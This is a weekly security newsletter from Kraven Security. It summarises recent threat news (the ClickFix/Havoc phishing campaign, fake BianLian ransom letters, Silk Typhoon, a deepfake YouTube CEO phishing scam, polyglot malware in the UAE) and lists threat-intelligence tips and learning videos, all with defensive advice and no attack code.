Hello there 👋
Welcome back to the Kraven Security weekly newsletter, triaging the week. We round up the week’s top news stories, highlight our featured article, give you some learning resources, and finish with a few personal notes about what’s happening at the company. Enjoy!
Top 5 News Stories
New ClickFix Phishing Attack Unleashes Havoc C2 via Microsoft SharePoint
A slick ClickFix phishing campaign is tricking users into running malicious PowerShell scripts, deploying the Havoc C2 framework through Microsoft SharePoint. Blending into legit traffic with Microsoft Graph API, this attack’s a stealthy beast.
Key takeaways:
🕵️♂️ Phishing Lure: A new ClickFix campaign kicks off with phishing emails sporting an HTML attachment (“Documents.html”) that fakes an error, duping users into copying and running a malicious PowerShell command.
📂 SharePoint Hideout: The attack fetches a PowerShell script from an attacker-controlled SharePoint site, then grabs a Python script to load Havoc, an open-source C2 framework, as a sneaky DLL.
🔗 Stealthy Comms: Using Microsoft Graph API, Havoc masks its command-and-control traffic within SharePoint’s legit functions, making it a nightmare to spot amid trusted services.
💻 Full Control: Once deployed, Havoc gives attackers remote access to compromised systems, rivaling tools like Cobalt Strike—Fortinet flagged this crafty multi-stage assault.
🛡️ Stay Sharp: Users should dodge unknown email attachments and orgs must monitor SharePoint for odd activity to block this growing ClickFix threat.
Fake BianLian Ransom Notes Target U.S. CEOs in Bold Postal Mail Scam
Scammers posing as the BianLian ransomware gang are mailing fake ransom notes to U.S. CEOs, demanding Bitcoin via QR codes and Tor links. Experts say it’s a clever con with no real breach—don’t fall for it, verify threats!
Key takeaways:
🕵️♂️ Physical Scam: Fraudsters are sending physical ransom letters to U.S. CEOs, mimicking BianLian’s style with QR codes for Bitcoin payments and links to their dark web leak site, marked “TIME SENSITIVE READ IMMEDIATELY.”
📬 Unusual Tactic: Unlike typical digital ransomware demands, these mailed notes from a Boston address lack evidence of actual network breaches, raising red flags for GuidePoint Security analysts.
🔍 Inconsistencies Found: The letters feature polished English (unlike BianLian’s usual notes), fresh Bitcoin wallets, and no intrusion proof—experts peg it as a scam to trick executives into paying without verification.
💰 Fear-Based Profit: The scheme banks on fear, not facts, targeting execs with threats of data leaks, though the real BianLian group sticks to digital extortion, not snail mail.
🛡️ Stay Smart: Companies should ignore unverified demands, check systems for actual breaches, and report these fakes to authorities to shut down this postal ploy.
Silk Typhoon Hackers Pivot to IT Supply Chains for Network Breaches
Microsoft warns that Silk Typhoon, a Chinese cyber-espionage group, is now targeting IT supply chains, exploiting remote management tools and cloud services to hit downstream networks. With breaches spanning government, healthcare, and more, this shift amplifies the espionage game.
Key takeaways:
🕵️♂️ Tactic Shift: Silk Typhoon (aka Hafnium), a Chinese state-sponsored group, has moved from direct exploits to targeting IT supply chains, hitting remote management tools and cloud apps for initial access, Microsoft reports on March 5, 2025.
🔓 Access Tricks: Using stolen API keys and compromised credentials from GitHub and beyond, they breach IT providers—think identity management and RMM solutions—to reach customer networks across industries like government, healthcare, and defense.
🌐 Wide Reach: Confirmed hits span the U.S. and global sectors (IT, education, energy, NGOs), with Silk Typhoon leveraging zero-days like Ivanti’s CVE-2025-0282 and Palo Alto’s CVE-2024-3400 for persistence via web shells.
🛠️ Stealthy Moves: After a breach, they abuse legitimate services (e.g., Microsoft apps) and covert networks to stay hidden, aiming for long-term espionage while Microsoft shares IOCs to fight back.
🛡️ Defender’s Move: Orgs must secure APIs, update vulnerable appliances, and hunt for Silk Typhoon’s latest TTPs. The detection rules are out, so lock it down now!
YouTube Alerts Users to AI-Generated CEO Video Fueling Phishing Scams
YouTube’s warning: an AI-generated video of CEO Neal Mohan is used in phishing attacks to steal creator credentials via fake monetization updates. Don’t click suspicious links. Scammers are exploiting private video shares to install malware or swipe logins.
Key takeaways:
🕵️♂️ AI Scam Alert: YouTube flagged a phishing campaign using an AI-crafted video of CEO Neal Mohan, shared privately to trick creators with fake monetization policy changes, reported on March 5, 2025.
📹 Sneaky Delivery: The video, pushed via phishing emails, links to “studio.youtube-plus[.]com,” a site mimicking YouTube’s Partner Program, aiming to nab login creds or drop malware.
🔒 Trust Eroded: Scammers exploit YouTube’s private video feature, prompting the company to stress it never contacts users this way.
🌍 Widespread Risk: Social media buzz and YouTube’s pinned community post highlight the scam’s reach, urging users to report shady channels and avoid unverified links.
🛡️ Stay Safe: Creators should skip unsolicited private video links, double-check domains, and lean on YouTube’s new hacked-account support tool to lock out these cons.
New Polyglot Malware Targets Aviation and Satellite Firms in UAE
Sneaky polyglot malware is hitting aviation and satellite firms in the UAE, hiding malicious payloads in legit-looking files. With critical transport orgs in the crosshairs, this attack’s evasion tactics are a wake-up call.
Key takeaways:
🕵️♂️ Stealthy Threat: An undocumented polyglot malware, blending multiple file formats (PDF, HTA, ZIP), is targeting aviation, satellite comms, and transport firms in the UAE, spotted by Positive Technologies in late 2024.
🔍 Evasion Master: It starts with phishing emails, using a benign PDF front to slip past security tools, then deploys HTA and ZIP payloads via PowerShell to dodge detection.
⚙️ Attack Chain: The malware leverages LNK files and obfuscated scripts to install backdoors, targeting critical orgs with sneaky persistence tricks.
🌍 High Stakes: Aimed at the UAE’s vital sectors, it’s unclear who’s behind it—state actors or cybercriminals—but the intent is serious disruption or espionage.
🛡️ Defense Up: Block risky file types (LNK, HTA, ZIP), scan emails rigorously, and train staff to spot phishing—multilayered security is the only way to fight this!
Top Tips of the Week
Threat Intelligence
- Collaborate across security teams for a holistic CTI approach. Break down silos and share insights for better threat awareness.
- Diversify your threat intelligence team. Different perspectives enhance analysis and interpretation of intelligence data.
- Integrate threat intelligence with SIEM tools. Enhance the capabilities of Security Information and Event Management for improved threat detection.
- Consider the human factor in CTI analysis. Recognize the role of human behavior in cyber threats for more effective defenses.
Threat Hunting
- Engage in threat intelligence forums. Participate in discussions to share insights and learn from others in the field.
- Implement threat intelligence metrics in cyber threat hunting. Track and measure the effectiveness of your efforts.
Custom Tooling
- Consider user experience in custom tool design. Intuitive interfaces enhance usability and encourage adoption.
Feature Video
The pyramid models how much pain we can inflict on the bad guys. It shows how some IOCs (Indicators of Compromise) are more difficult for an adversary to change than others, and denying the adversary certain indicators causes them a greater loss (more pain) than denying them others.
As defenders, we should aim to target the indicators that cause a greater loss to the adversary to bolster our defenses!
Learning Resources
The Rise of Session Takeovers
Session hijacking is on the rise. Attackers are stealing session tokens to bypass MFA and takeover online accounts. This excellent presentation from the team at Flare covers everything you need to know.
It details the various methods cybercriminals use to hijack victim sessions and profit through dark web marketplaces and Telegram channels. The presentation concludes by exploring how enterprises can leverage AI tools and threat intelligence platforms to detect and revoke compromised sessions before damage occurs.
Master Docker Today!
Docker simplifies software deployment. It isolates applications and their dependencies, allowing you to deploy applications with ease. This great tutorial shows you how to run, manage, and optimize containerized applications using Docker, Docker Compose, and Podman.
It is a must-watch if you want to up your Docker skills and learn to pull and run images, map ports for web access, and build lightweight, efficient containers!
Ditch OBS, Use Meld Studio Instead
Content creation helps you learn complex topics, support others on their learning journey, and stand out from the crowd. I’ve been using OBS for years to make videos, but a new kid on the block is offering a more user-friendly and efficient alternative: Meld Studio.
This video covers everything you need to know to get started using Meld and create your perfect streaming or recording setup in minutes. Meld provides a streamlined experience that caters to 99% of content creators. Check it out now!
The Evolution of Cyber Mercenaries
In this eye-opening discussion, Tim Mauer highlights the evolving role of cyber mercenaries. These hackers operate outside traditional state structures but often act on behalf of governments, offering them plausible deniability and additional capabilities.
The conversation highlights the complexities of global cyber conflict, showing how different nations control (or fail to control) their cyber proxies and potential problems that can unfold. A must-watch for a cyber threat intelligence professional!
